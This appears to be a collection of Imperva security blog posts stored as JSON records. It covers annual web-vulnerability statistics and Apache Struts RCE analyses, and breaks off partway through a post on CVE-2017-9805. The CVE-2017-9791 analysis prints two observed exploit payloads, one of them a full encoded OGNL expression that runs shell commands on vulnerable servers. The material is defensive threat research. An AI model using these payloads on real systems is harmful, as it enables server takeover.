2016-2018_\n\n## Vulnerabilities by Category\n\nIn Figure 2, you can find 2018 vulnerabilities split into _[OWASP TOP 10 2017](<https://www.imperva.com/app-security/owasp-top-10/>)_ categories.\n\n## Most Common Vulnerability: Injections\n\nThe dominant category this year was by far **injections**, with 19% (3,294) out of the total vulnerabilities of 2018, which is also a 267% increase from last year. When talking about injection vulnerabilities, the first thing that jumps to mind is SQL injections. When drilling down the data, however, we saw remote command execution (RCE) emerge as the bigger issue, with 1,980 vulnerabilities (11.5%), compared to 1,354 vulnerabilities (8%) for SQLi.\n\n_Figure 2: Vulnerabilities into categories 2014-2018_\n\n## No. 2 Vulnerability \u2014 Cross-Site Scripting\n\nThe number of Cross-site scripting (XSS) vulnerabilities continued to grow and appears to be the second most common vulnerability (14%) among 2018 web application vulnerabilities.\n\n## IoT Vulnerabilities Decreased\n\nIt appears that the number of IoT vulnerabilities has decreased tremendously. Despite the common belief that all our electronic devices can be easily compromised, it appears that something has changed in this area. Possible explanations include: IoT vendors have finally started to implement better security in IoT devices, or that hackers and researchers found another area to focus on in 2018.\n\n \n_Figure 3: IoT vulnerabilities 2014-2018_\n\n## API Vulnerabilities: Growing, but Slowing\n\nAPI (Application Programming Interface) vulnerabilities are becoming more widespread as time goes by. Figure 4 shows the number of API vulnerabilities between 2015-2018. New API vulnerabilities in 2018 (264) increased by 23% over 2017 (214), by 56% compared to 2016 (169), and by 154% compared to 2015 (104).\n\n \n_Figure 4: API vulnerabilities 2015-2018_\n\nAlthough API vulnerabilities continue to grow year-over-year, it appears to be slowing, from 63% between 2015-16 to 27% in 2016-2017 and now 23% between 2017-18. One possible explanation is that since APIs are more popular nowadays, they draw more attention from hackers and security researchers. In turn, organizations spend more time securing their APIs.\n\n## Vulnerabilities in Content Management Systems: Attackers Focused on WordPress\n\nThe most popular content management system is _[WordPress](<https://en.wikipedia.org/wiki/WordPress>)_, used by over 28% of all websites, and by 59% of all websites using a known content management system, according to market share statistics cited by Wikipedia, followed by _[Joomla](<https://en.wikipedia.org/wiki/Joomla>) _and _[Drupal](<https://en.wikipedia.org/wiki/Drupal>)_. Perhaps unsurprisingly, WordPress also registered the highest number of vulnerabilities (542) last year, which is a 30% increase from 2017 (Figure 5).\n\n \n_Figure 5: Number of vulnerabilities by CMS platform 2016-2018_\n\nAccording to the _[WordPress ](<https://wordpress.org/plugins/>)_official site, the current number of plugins is 55,271. This means that only 1,914 (3%) were added in 2018.\n\n \n_Figure 6: Number of WordPress plugins_\n\nDespite the slowed growth in new plugins, **the number of WordPress vulnerabilities increased.** The explanation for this could either be the code quality of the plugins, or the fact that WordPress is such a popular CMS, which motivate more attackers to develop dedicated attack tools and try their luck searching for holes in the code.\n\nUnsurprisingly, 98% of WordPress vulnerabilities are related to _[plugins](<https://en.wikipedia.org/wiki/WordPress>)_[ ](<https://en.wikipedia.org/wiki/WordPress>)(see Figure 7 below), which extend the functionality and features of a website or a blog. Anyone can create a plugin and publish it \u2014 WordPress is open source, easy to manage, and there is no enforcement or any proper process that mandates minimum security standards (e.g. code analysis). Hence, WordPress plugins are prone to vulnerabilities.\n\n \n_Figure 7: WordPress third party vendor vulnerabilities in 2018_\n\nIn Figure 8 below, you can find the ten WordPress plugins with the most vulnerabilities discovered in 2018. Note that these are not necessarily the most-attacked plugins as the report refers to the amount of vulnerabilities seen throughout the year \u2013 and is based upon the continual aggregation of vulnerabilities from different sources. Our annual report is solely based on statistics from this system, and we listed all vulnerabilities that were published during 2018 in general, in WordPress and WordPress plugins._ _This indicator solely looks at the most vulnerabilities. There are other measures that are not included in the report - such as \u2018top attacked\u2019 or \u2018riskiest\u2019 - which do not necessarily correlate with this measurement.\n\n \n\n\n \n_Figure 8: Top 10 vulnerable WordPress plugins in 2018_\n\n## Server Technologies: PHP Vulnerabilities Fell\n\nSince the most popular server-side programming language for websites continues to be PHP, we expect it to have more vulnerabilities than equivalent languages. And that was true. However, as Figure 9 below shows, new vulnerabilities in PHP fell in 2018 versus 2017, just as they did in the prior year. The lack of PHP updates - only one minor update was released, PHP 7.3, in December - could explain why.\n\n \n_Figure 9: Top server-side technology vulnerabilities 2014-2018_\n\n## The Year of Drupal\n\nAlthough Drupal _[is the third-most](<https://w3techs.com/technologies/overview/content_management/all>) _popular CMS, two of its vulnerabilities, _[CVE-2018-7600](<https://www.imperva.com/blog/drupalgeddon-2-0-are-hackers-slacking-off/>) _('23-mar' bar in Figure 10 below), and _[CVE-2018-7602 ](<https://www.imperva.com/blog/just-third-critical-drupal-flaw-discovered/>)_('25-apr' bar below, also known as _[Drupalgeddon2 ](<https://www.imperva.com/blog/drupalgeddon-2-0-are-hackers-slacking-off/>)_and _[Drupalgeddon3](<https://www.imperva.com/blog/just-third-critical-drupal-flaw-discovered/>)_), were the root cause of many security breaches in hundreds of thousands of web servers in 2018. These vulnerabilities allowed an unauthenticated attacker to remotely inject malicious code and run it on default or common Drupal installations. These vulnerabilities allow attackers to connect to backend databases, scan and infect internal networks, mine cryptocurrencies, infect clients with trojans, and more.\n\nThe simplicity of these Drupal vulnerabilities and their catastrophic impact made them a weapon of choice for many attackers. In fact, Imperva detected and blocked more than half a million attacks related to these vulnerabilities during 2018. These attacks were also the basis for a few interesting _[blogs ](<https://www.incapsula.com/blog/crypto-me0wing-attacks-kitty-cashes-in-on-monero.html>)_we wrote this year. There was another risky vulnerability, part of the Drupal security patch _[sa-core-2018-006](<https://www.drupal.org/sa-core-2018-006>)_, that published in October. However, since it was not easy to exploit, the number of attacks was small.\n\n \n\n_Figure 10: CVSS Score of Drupal vulnerabilities in 2018_\n\n## Predictions for 2019\n\nAs a security vendor, we\u2019re often asked about our predictions. Here are our vulnerability predictions for 2019:\n\n * PHP announced that versions 5.5, 5.6 and 7.0 reached their _[end of life](<https://secure.php.net/supported-versions.php>)_. That means that these versions will no longer receive security updates. Major CMS like WordPress, Drupal, and Joomla are developed in PHP and require newer versions of PHP. However, they still support older versions. The result is that hackers are now motivated to find new security vulnerabilities in unsupported PHP versions since they will not be fixed and impact every application built with these outdated versions. For example, according to _[Shodan](<https://www.shodan.io/search?query=php%2F5>)_ there are currently 34K servers with these unsupported PHP versions\n * Injection vulnerabilities will continue to grow mainly because of the economic implications to attackers (make fast money)\n * More vulnerabilities in APIs will be discovered as DevOps become a crucial factor in IT and their usage and demand for APIs is growing\n\n## How to Protect Your Apps and Data\n\nOne of the best solutions for protecting against web application vulnerabilities is to deploy a web application firewall (WAF). A WAF may be either on-premises, in the cloud or _[a combination of both](<https://www.imperva.com/blog/2017/11/cloud-waf-versus-on-premises-waf/>)_ depending on your needs, infrastructure, and more. As organizations are moving more of their apps and data to the cloud, it\u2019s important to think through your security _[requirements](<https://www.imperva.com/blog/2017/06/waf-requirements-and-deployment-options-for-the-cloud/>)_. A solution supported by a dedicated security team is one to add to your selection criteria. Security teams can push timely security updates to a WAF in order to properly defend your assets.\n\n \n\n \n\nThe post [The State of Web Application Vulnerabilities in 2018](<https://www.imperva.com/blog/the-state-of-web-application-vulnerabilities-in-2018/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-01-09T14:00:26", "type": "impervablog", "title": "The State of Web Application Vulnerabilities in 2018", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600", "CVE-2018-7602"], "modified": "2019-01-09T14:00:26", "id": "IMPERVABLOG:B21E6C61B26ED07C8D647C57348C4F9E", "href": "https://www.imperva.com/blog/the-state-of-web-application-vulnerabilities-in-2018/", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-14T02:18:38", "description": "On July 7th, a new security vulnerability was published in Apache Struts 2 CVE-2017-9791 (S2-048[1]). Struts 2.3.x users with Struts 1 plugin, which includes the Showcase app, are vulnerable.\n\nOnce again, this vulnerability enables a Remote Code Execution (RCE), which is the most commonly exploited Apache Struts vulnerability. In this case, as in many other cases of RCE in Apache Struts, the attacks observed in the wild are also carried in the form of Object-Graph Navigation Language (OGNL) expressions.[2]\n\nLike the recent Struts 2 RCE [CVE-2017-5638](<https://www.imperva.com/blog/2017/03/cve-2017-5638-new-remote-code-execution-rce-vulnerability-in-apache-struts-2/>), Imperva customers are protected against current variations of the attack using the zero-day attack detection mechanism in either SecureSphere or Incapsula. The zero-day attack detection mechanism protects against malicious traffic regardless of a specific web exploit.\n\n## The Vulnerability\n\nBased on [Apache release notes](<https://cwiki.apache.org/confluence/display/WW/S2-048>), \u201cit is possible to perform a RCE attack with a malicious field value when using the Struts 2 Struts 1 plugin and it's a Struts 1 action and the value is a part of a message presented to the user\u201d. The message presented to the user is processed by the \u201cActionMessage\u201d routine and returned back to the user by the \u201cmessage\u201d function as follows:\n \n \n messages.add(\"msg\", new ActionMessage(**the_message**));\n\nLacking proper validation before execution, the message (the_message) processed by the server may potentially cause a remote code execution. To fulfill its execution potential, a remote entry point is required for the message. Following the route of the vulnerable code leads to this location:\n \n \n /struts2-showcase/integration/saveGangster.action\n\nPoking around the webpage reveals several inputs controlled by the user, including name, age, and description (see Figure 1):\n\n\n\n_Figure 1: Vulnerable Apache Struts application_\n\nWhen submitting the \u201cGangster\u201d data the server processes the user\u2019s input with the vulnerable \u201cActionMessage\u201d routine and returns a message to the user (see Figure 2):\n\n\n\n\n\n_Figure 2: Request to the vulnerable page and result_\n\nAs can be observed, the processed message is integrated with the user\u2019s input data (\u201c_Gangster a added\u2026_\u201d) which means now the input data can be modified to include arbitrary code execution (see Figure 3). For instance, the RCE payload can add a custom header to the response message or use an OGNL mechanism to run malicious code (see the second payload in \u201cAttacks in the Wild\u201d section):\n\n\n\n_Figure 3: Exploitation of the vulnerable application_\n\n## Imperva Zero-Day Protection\n\nAs mentioned earlier, Imperva customers are protected against this new Apache Struts vulnerability using zero-day detection mechanisms from either SecureSphere or Incapsula, which detect incoming traffic with malicious content, regardless of a specific vulnerability or exploit.\n\nThe zero-day detection technique prevents the new attack using two complementary deterrence layers:\n\n * First, since the exploit includes an arbitrary remote code to be executed, customers are protected out-of-the-box to most attack variations using a generic Remote Command Execution mitigation mechanism (see Figure 4):\n\n\n\n_Figure 4: SecureSphere blocking a generic RCE_\n\n * Then, in the second layer of defense, SecureSphere and Incapsula both detect potential OGNL expressions which are used to manipulate Java objects, and are commonly used by attackers to inject remote code in vulnerable Apache Struts servers, including in this attack (see Figure 5):\n\n__\n\n_Figure 5: SecureSphere blocking a generic OGNL-based RCE_\n\nNevertheless, to be on the safe side, a few hours following the release of this critical vulnerability our security teams published a dedicated mitigation guideline and virtually patched Imperva customers.\n\n## Attacks in the Wild\n\nAn increasing amount of attack attempts have been seen since the publication of this new Struts vulnerability, mostly as hard copy replication of PoCs published shortly after the first announcement, and refer to reconnaissance attempts to track vulnerable servers. Below are details on two common payloads seen in the wild.\n\n### Payload #1: Custom Header Insertion Attempts\n\n**Part of a blocked HTTP request carrying CVE-2017-9791 RCE exploit** \n--- \n**HTTP Method:** | POST \n**POST Body:** | **${#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-BIGSCAN-Test','fe9a40f002fe11e7b4ef0242c0a8050\u2032)}** \n**URL:** | /struts2-showcase/integration/savegangster.action \n \nHTTP headers are easily parsed and extracted with automated scripts, therefore validating the existence of a new custom HTTP header is very straight forward for the attackers to implement and can be used as a reconnaissance request before the actual attack \u2013 i.e., the actual RCE which will take over the server.\n\nIn most cases attackers will use this kind of reconnaissance as part of a vulnerability scanning tool on predefined IPs range, facilitating bots to effectively scan a wide range of addresses. Based on our classification analysis, IPs that were registered in this attack are known to generate mostly bot traffic (~96%).\n\n### Payload #2: OGNL Expression Execution Attempts\n\n**Part of a blocked HTTP request carrying CVE-2017-9791 RCE exploit** \n--- \n**HTTP Method:** | POST \n**POST Body:** | **%7b%28%23szgx%3d%27multipart%2fform-data%27%29.%28%23dm%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3f%28%23_memberAccess%3d%23dm%29%3a%28%28%23container%3d%23context%5b%27com.opensymphony.xwork2.ActionContext.container%27%5d%29.%28%23ognlUtil%3d%23container.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3d%27echo%20891549112%27%29.%28%23iswin%3d%28%40java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3d%28%23iswin%3f%7b%27cmd.exe%27%2c%27%2fc%27%2c%23cmd%7d%3a%7b%27%2fbin%2fbash%27%2c%27-c%27%2c%23cmd%7d%29%29.%28%23p%3dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3d%23p.start%28%29%29.%28%23ros%3d%28%40org.apache.struts2.ServletActionContext%40getResponse%28%29.getOutputStream%28%29%29%29.%28%40org.apache.commons.io.IOUtils%40copy%28%23process.getInputStream%28%29%2c%23ros%29%29.%28%23ros.close%28%29%29%7d** \n**URL:** | /struts2-showcase/integration/savegangster.action \n \nDecoding the URL\u2019s payload injected to the name parameter unveils the following RCE (see Figure 6):\n\n\n\n_Figure 6: OGNL-based RCE (URL Decoded)_\n\nThe payload in this case refers to an attempt to execute OGNL expression, as an entry point to the attack. Again, in this case it is only a reconnaissance attempt before the attack, in which the attacker echoed a random generated number \u201c89159112\u201d to match when processing the response message.\n\nIt will be interesting to monitor the trending exploits over time and to see if and how the reconnaissance trend gradually shifts to actual exploitation attempts of these servers.\n\n## Stay Protected\n\nBased on the official [advisory](<http://seclists.org/oss-sec/2017/q3/92>) this vulnerability does not affect applications using Struts 2.5.x series or applications that do not use the Struts 1 plugin. Meaning that an update is required for those who use the earlier vulnerable patches. It is also mentioned that even if the Struts 1 plugin is available while excluding certain code parts, the application is safe.\n\nAn alternative to the formal advisory, which could be costly and time consuming, is [virtual patching](<https://www.owasp.org/index.php/Virtual_Patching_Best_Practices>). Instead of leaving a web application exposed to attack while attempting to modify code after discovering a vulnerability, virtual patching actively protects web apps from attacks, reducing the window of exposure and decreasing the cost of emergency fix cycles until you\u2019re able to patch them.\n\nIn addition to virtual patching, zero-day detection mechanisms such as those mentioned above protect sites by detecting and blocking new strains of attack prior to its release without any modification to systems.\n\nLearn more about protecting web applications from vulnerabilities using [Imperva Incapsula WAF](<https://www.incapsula.com/website-security/web-application-firewall.html>) or [Imperva SecureSphere WAF](<https://www.imperva.com/Products/WebApplicationFirewall-WAF>).\n\n[1] <https://cwiki.apache.org/confluence/display/WW/S2-048>\n\n[2] <https://www.imperva.com/blog/2017/01/remote-code-execution-rce-attacks-apache-struts/>", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2017-07-13T19:12:31", "type": "impervablog", "title": "CVE-2017-9791: Analysis of RCE in the Struts Showcase App in Struts 1 Plugin", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-9791", "CVE-2017-5638"], "modified": "2017-07-13T19:12:31", "id": "IMPERVABLOG:DA39045C8E700086C560AAFFDBA589A6", "href": "https://www.imperva.com/blog/2017/07/cve-2017-9791-rce-in-struts-showcase-app-in-struts-1-plugin/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-28T17:52:36", "description": "As a web application firewall provider, part of our job at Imperva is constantly monitoring new security vulnerabilities. To do this, we use internal software that collects information from various data sources such as vulnerability databases, newsletters, forums, social media and more, integrate it into a single repository, and assess each vulnerability\u2019s priority. Having this kind of data puts us in a unique position to provide analysis of all web application vulnerabilities throughout the year, view trends and notice significant changes in the security landscape.\n\nAs we did [last year](<https://www.imperva.com/blog/2016/12/state-web-applications-vulnerabilities-2016/>), before we enter 2018, we took a look back at 2017 to understand the changes and trends in web application security over the past year.\n\nThis year we registered a record high number of web application vulnerabilities including well-known categories like [cross-site scripting](<https://www.imperva.com/app-security/threatglossary/cross-site-scripting-xss/>), but also new categories such as insecure [deserialization](<https://www.owasp.org/index.php/Deserialization_Cheat_Sheet>). In addition, the number of internet of things (IoT) vulnerabilities continued to grow and severely impact the security landscape. WordPress and PHP each continued to \u201cdominate\u201d in terms of vulnerabilities published in the content management system and server side technologies respectively. [Apache Struts vulnerabilities](<https://www.imperva.com/blog/2017/03/cve-2017-5638-new-remote-code-execution-rce-vulnerability-in-apache-struts-2/>), although the framework is less popular in the market at large, had a huge effect and were claimed to be the root cause of one of the biggest security breaches in 2017.\n\n## 2017 Web Application Vulnerabilities Statistics\n\nOne of the first stats we review is quantity, meaning how many vulnerabilities were published in 2017 and how that number compares to previous years.\n\nFigure 1 shows the number of vulnerabilities on a monthly basis over the last two years. We can see that the overall number of new vulnerabilities in 2017 (14,082) increased significantly (212%) compared to 2016 (6,615). According to our data, more than 50% of web application vulnerabilities have a public exploit available to hackers. In addition, more than a third (36%) of web application vulnerabilities don\u2019t have an available solution, such as a software upgrade workaround or software patch.\n\nAs usual, cross-site scripting (Figure 2) vulnerabilities are the majority (8%) of 2017 web application vulnerabilities. In fact, their amount has doubled since 2016.\n\n_Figure 1: Number of web application vulnerabilities in 2016-2017_\n\n## OWASP Top 10 View\n\nThis year [OWASP released](<https://www.owasp.org/images/7/72/OWASP_Top_10-2017_%28en%29.pdf.pdf>) their long awaited \u201cTop 10\u201d list, which included two new risks:\n\n### Insecure Deserialization\n\nSerialization is the process of translating data structures or object state into a format that can be stored (for example, in a file or memory buffer) or transmitted (for example, across a network connection link) and reconstructed later (deserialization). Serialization is widely used in RPC, HTTP, databases, etc.\n\nApplications and APIs may be vulnerable if they deserialize hostile or tampered objects supplied by an attacker without proper sanitization. Therefore, we thought it would be interesting to view the security vulnerabilities in light of these changes.\n\n_Figure 2: Number and type of OWASP Top 10 vulnerabilities 2014-2017_\n\nThe amount of deserialization vulnerabilities from 2016-2017 (Figure 2) increased substantially from previous years which may explain how they \u201cearned\u201d their spot in the new OWASP Top 10 list. Today, more and more applications and frameworks are using standard APIs to communicate. Some of these APIs take serialized objects and deserialize them in return, which can explain the growing trend of insecure deserialization vulnerabilities.\n\n### Insufficient Logging and Monitoring\n\nAttackers rely on the lack of monitoring and timely response to achieve their goals without being detected. We have not found any vulnerabilities published in 2017 that are directly related to this category. It will be interesting to monitor it and see if that will change next year.\n\n## The Rise of the (IoT) Machines\n\nNowadays nearly every aspect of our lives is connected to the internet and we can find smart devices everywhere\u2014in our home refrigerator, TV, lights, doors, locks and even the clothes we wear. These devices are designed to send and receive information and thus are usually connected to the internet at all times. In many cases the vendors of smart devices neglect to secure them properly or even \u201cbackdoor\u201d them on purpose in order to gain hidden access.\n\n \n_Figure 3: IoT vulnerabilities 2014-2017_\n\n2017 registered a record high of 104 IoT-related vulnerabilities (Figure 3), a huge increase relative to previous years. The rising trend in the amount of vulnerabilities can be associated with their increasing popularity in our modern lives and advances in IoT technology that make IoT devices cheaper and accessible to more people.\n\nOne of the most popular vulnerability types in IoT devices (35%) is using default or easy to guess credentials in order to gain access to the device and take control of it. Once the device is controlled by the attacker it can be used to mount any kind of attack. Earlier this year the well-known [Mirai malware used this kind of vulnerability](<https://www.incapsula.com/blog/malware-analysis-mirai-ddos-botnet.html>) (default credentials) to spread itself through the network. Once the malware gained access to the device, it turned it into a remote-controlled bot that was used as part of huge a DDoS attack.\n\n## Content Management Systems\n\nWhen analyzing content management system (CMS) frameworks, we decided to concentrate on the four leading platforms that account for [60% of the market share](<https://w3techs.com/technologies/overview/content_management/all>)\u2014WordPress, Joomla, Drupal and Magento.\n\n_Figure 4: Number of vulnerabilities by CMS platform 2016-2017_\n\n### WordPress\n\nAs suspected, WordPress vulnerabilities continue to be the lion\u2019s share of all CMS-related vulnerabilities. In fact, WordPress vulnerabilities (418) have increased by ~400% since 2016 (Figure 4).\n\nFurther analysis of WordPress vulnerabilities showed that 75% of the 2017 vulnerabilities originated from third-party vendor plug-ins (Figure 5).\n\n_Figure 5: WordPress third party vendor vulnerabilities in 2017_\n\nThe rise in the number of vulnerabilities can be explained by the growth of WordPress (Figure 6) and because [third party plug-in](<https://www.wpwhitesecurity.com/wordpress-security/statistics-highlight-main-source-wordpress-vulnerabilities/>) code is notoriously known for its bad security.\n\n**Year** | **Number of WordPress Plug-ins** \n---|--- \n**2015** | 41,347 \n**2016** | 48,044 \n**2017** | 53,357 \n \n_Figure 6: WordPress plug-in's trend_\n\n## Server-side Technologies\n\nPHP is still the most prevalent server-side language, therefore it\u2019s expected be associated with the highest number of vulnerabilities. In 2017, 44 vulnerabilities in PHP were published (Figure 7) which is a significant decrease (-143%) from the number of PHP vulnerabilities in 2016 (107) (see Figure 7). At the end of 2015, PHP released a major version, 7.0, after almost a year and half with no updates, which can explain the growth in the number of vulnerabilities in 2016. Last year PHP released a minor version, 7.1 (December 2016), with slight changes which can explain the decrease in the number of vulnerabilities in 2017.\n\n_Figure 7: Top server-side technology vulnerabilities 2014-2017_\n\n## The Year of Apache Struts\n\nAlthough 2017 listed fewer vulnerabilities in the Apache Struts framework (Figure 8), their impact was huge as some of them included unauthenticated [remote code execution](<https://www.imperva.com/blog/2017/01/remote-code-execution-rce-attacks-apache-struts/>) (RCE) which basically means that anyone can hack and take over the server, access private information and more.\n\n_Figure 8: Apache Struts and remote code execution vulnerabilities in 2014-2017_\n\nWe have previously blogged about this [specific vulnerability](<https://www.imperva.com/blog/2017/03/cve-2017-5638-new-remote-code-execution-rce-vulnerability-in-apache-struts-2/>) and [multiple other Apache Struts](<https://www.imperva.com/blog/2017/09/cve-2017-9805-analysis-of-apache-struts-rce-vulnerability-in-rest-plugin/>) vulnerabilities in detail. They\u2019re worth checking out if you haven\u2019t already.\n\n## Predictions Toward 2018\n\nAs a security vendor, we\u2019re often asked about our predictions. Here are a couple of possible vulnerabilities trends for 2018:\n\n * Cross-site scripting vulnerabilities will continue to lead mainly because of the rise of [cryptojacking](<https://www.wired.com/story/cryptojacking-cryptocurrency-mining-browser/>) and the increasing popularity of server-side technologies that utilize JavaScript (e.g., Node.JS).\n * More authentication-related vulnerabilities from the family of \u201cdefault/guessable credentials\u201d will be discovered (especially in IoT devices) and exploited in order to herd new botnets. These botnets can be used to mount any kind of large scale attacks\u2014DDoS, brute force and more.\n\n## How to Protect Your Apps and Data\n\nOne of the best solutions for protecting against web application vulnerabilities is to deploy a [web application firewall](<https://www.imperva.com/products/application-security/web-application-firewall-waf/>) (WAF). A WAF may be either on-premises, in the cloud or [a combination of both](<https://www.imperva.com/blog/2017/11/cloud-waf-versus-on-premises-waf/>) depending on your needs and infrastructure.\n\nAs organizations are moving more of their apps and data to the cloud, it\u2019s important to think through your security [requirements](<https://www.imperva.com/blog/2017/06/waf-requirements-and-deployment-options-for-the-cloud/>). A solution supported by a dedicated security team is an important requirement to add to your selection criteria. Dedicated security teams are able to push timely security updates to a WAF in order to properly defend your assets.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2017-12-28T17:20:47", "type": "impervablog", "title": "The State of Web Application Vulnerabilities in 2017", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638", "CVE-2017-9805"], "modified": "2017-12-28T17:20:47", "id": "IMPERVABLOG:6BF557CA0830C9058E2409E8C914366C", "href": "https://www.imperva.com/blog/2017/12/the-state-of-web-application-vulnerabilities-in-2017/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-09-09T07:20:50", "description": "Just two months ago we [published an analysis](<https://www.imperva.com/blog/2017/07/cve-2017-9791-rce-in-struts-showcase-app-in-struts-1-plugin/>) of a critical remote code execution (RCE) security vulnerability in Apache Struts. Now Apache Struts has published a new version fixing yet another critical RCE vulnerability (September 5, 2017).\n\n[CVE-2017-9805](<http://struts.apache.org/docs/s2-052.html>) is a vulnerability in Apache Struts related to using the Struts REST plugin with XStream handler to handle XML payloads. If exploited it allows a remote unauthenticated attacker to run malicious code on the application server to either take over the machine or launch further attacks from it.\n\n## Imperva Customers Protected\n\nIn addition to our zero-day protection rules that spotted this attack, we\u2019ve also published new dedicated security rules to provide maximum protection to Imperva SecureSphere and Incapsula WAF customers against this vulnerability. As of the publication date of this post, our systems have successfully blocked thousands of attacks from all over the world (see \"In the Wild\" section below).\n\n## Multiple Apache Struts Vulnerabilities in 2017\n\nAs mentioned above, this isn\u2019t the first time such a critical vulnerability has been found in Apache Struts. In fact, we\u2019ve seen an increasing amount of them in the Struts platform as several other RCE vulnerabilities have already been discovered since the beginning of 2017. The CVEs are summarized below.\n\n**Date** | **CVSS** | **Vulnerability** | **CVE** \n---|---|---|--- \n9/7/2017 | 9.3 | Apache Struts views/freemarker/FreemarkerManager.java Freemarker Tag Handling Remote Code Execution | 2017-12611 \n9/5/2017 | 10 | Apache Struts REST Plugin XStream XML Request Deserialization Remote Code Execution | 2017-9805 \n7/11/2017 | 5 | Apache Struts URL Validator Regular Expression URL Handling Remote DoS | 2017-7672, 2017-9804 \n7/11/2017 | 6.8 | Apache Struts Spring AOP Functionality Unspecified Remote DoS | 2017-9787 \n7/7/2017 | 10 | Apache Struts 1 Plugin for Struts 2 ActionMessage Class Error Message Input Handling Remote Code Execution | 2017-9791 \n3/6/2017 | 10 | Apache Struts Jakarta Multipart Parser File Upload Multiple Content Value Handling Remote Code Execution (Struts-Shock) | 2017-5638 \n \n## About the CVE-2017-9805 Vulnerability\n\nApache Struts contains a flaw in the REST Plugin XStream that is triggered as the program insecurely deserializes user-supplied input in XML requests. More specifically, the problem occurs in XStreamHandler\u2019s toObject () method, which does not impose any restrictions on the incoming value when using XStream deserialization into an object, resulting in arbitrary code execution vulnerabilities. More information about the vulnerability can be found [here](<https://lgtm.com/blog/apache_struts_CVE-2017-9805>).\n\n## In the Wild\n\nTo date, our systems have successfully blocked thousands of attacks from all over the world with China, as usual in Apache Struts vulnerabilities, identified as the most prominent source of attacks (see Figure 1).\n\n[](<https://www.imperva.com/blog/wp-content/uploads/2017/09/Distribution-of-CVE-2017-9805-attacks-WW-1-2.png>)\n\n_Figure 1: Geo-distribution of CVE-2017-9805 attacks_\n\nIt is interesting to note that a single Chinese IP is responsible for more than 40% of the attack attempts that we registered. According to [Shodan](<https://www.shodan.io/>), this IP is registered to a large Chinese e-commerce company and runs an open SSH server which may indicate that this is a compromised machine. This machine tried to attack dozens of sites with different automated tools impersonating legitimate browsers such as cURL, wget, and Python-requests indicating the persistency of the attacker(s). [Unlike past vulnerabilities](<https://www.imperva.com/blog/2017/07/cve-2017-9791-rce-in-struts-showcase-app-in-struts-1-plugin/>), most of the attempted attacks (~80%) refer to exploitation attempts and only 20% refer to reconnaissance attempts to track vulnerable servers (see Figure 2). Exploitation 